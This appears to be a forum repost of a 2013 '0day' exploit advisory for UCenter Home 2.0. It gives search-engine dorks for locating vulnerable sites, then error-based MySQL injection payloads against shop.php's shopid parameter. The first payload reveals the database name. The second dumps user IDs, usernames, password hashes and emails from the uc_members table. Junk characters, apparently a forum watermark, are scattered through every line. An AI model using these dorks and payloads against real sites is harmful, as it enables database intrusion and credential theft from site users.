3 a8 ?; K9 N2 N' j7 D* Z5 m
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
" O; ~+ A3 F( A' y. `& m5 g
, O! W5 z7 G! T. W
+ X! ?- D2 {6 u' M! f% I& C; C/ F, N+ ~* J7 Q( J
*/ Author : KnocKout
- g4 v4 ?* W Y/ `
+ H+ W- |# ~/ ]& `*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
+ i4 V( j0 J* ~. }1 N: ]: r
) q* Q' N3 t' y! |9 X$ y9 r! n*/ Contact: knockoutr@msn.com ( T) z" ~) c0 ~0 e
: B& |9 ?. c7 n6 J) M*/ Cyber-Warrior.org/CWKnocKout
! m* w- M. N" M+ `$ ?/ I. F* D% _( m! q' V8 k) N. N
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
$ n9 Y* P6 n" I4 U( m. L
9 |' ?% W0 {% ?Script : UCenter Home
7 P2 }. S% Y* A- c5 l3 l' z; N, x' _
1 w3 z0 U! w1 _0 G/ s# B5 X; FVersion : 2.0
- g2 R% N/ d, l+ O; }
* g7 H7 |9 P1 }( r/ UScript HomePage : http://u.discuz.net/ 5 S2 z( e2 Q+ P- F
+ B* U+ Q0 S+ C8 Z ~# B( D$ v
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
) _* w f0 `: n" X+ ^9 o/ B: g; r4 Q* G
Dork : Powered by UCenter inurl:shop.php?ac=view . C2 \7 g. K X* g2 n- v3 B. j
) h1 O* t1 i4 @: ]
Dork 2 : inurl:shop.php?ac=view&shopid=
& `) s. h' ^2 B1 O- Y7 N6 E' p. j$ v3 q) a; L
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
# R1 N2 t% E4 e4 v5 C% j7 Y1 c) C% D: }6 n( ?( S
Vuln file : Shop.php
# |: h+ ?7 k- F; \
4 k" N" L; y2 _value's : (?)ac=view&shopid= $ r5 o0 q* N& c6 q7 U: T5 L
: Y5 S$ U& ?' _: k
Vulnerable Style : SQL Injection (MySQL Error Based)
$ t5 I+ {' \2 p |9 C" Y, z- N$ }: M
Need Metarials : Hex Conversion
( f6 Q' z! r3 R+ ^( o5 L' s# A; F" B( n5 O! ]5 A
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 1 {9 `0 j6 H2 `4 N- w1 T# v; K
/ v- A5 E$ B; g! FYour Need victim Database name.
" l) z* W' g% W+ a) X% x
0 q: l8 g8 M- N8 q8 ?for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
0 v, l2 ~$ ~( U4 U: U" F/ M# d; ^+ t6 t
.. ! _/ d" |1 `+ C3 l4 w4 v9 y# Z
- b# \) x: ~$ Q+ Y" k' B H
DB : Okey. - A& ^; v! L& F. c, P7 O* w! c5 F
3 T3 x# T/ p/ Z ~- Z" I8 d
your edit DB `[TARGET DB NAME]` ) V) w2 p4 e9 @
) \$ D4 ]5 } b! M* B7 b5 ?Example : 'hiwir1_ucenter' 9 g F0 C" [: z
0 ~! x& \ T4 ?Edit : Okey.
4 } A- F: [+ i, `
- ?4 v3 U$ b3 h( JYour use Hex conversion. And edit Your SQL Injection Exploit..
9 {- R4 B2 O0 a) ]7 D4 F* f: t
+ p2 b: o0 Y" {
' v# j. H! Q! r: n
" ]' A* N2 `. f. nExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
, o! _( Y$ O3 b# Z |
发表于 2013-2-27 21:31:31
收藏
支持
反对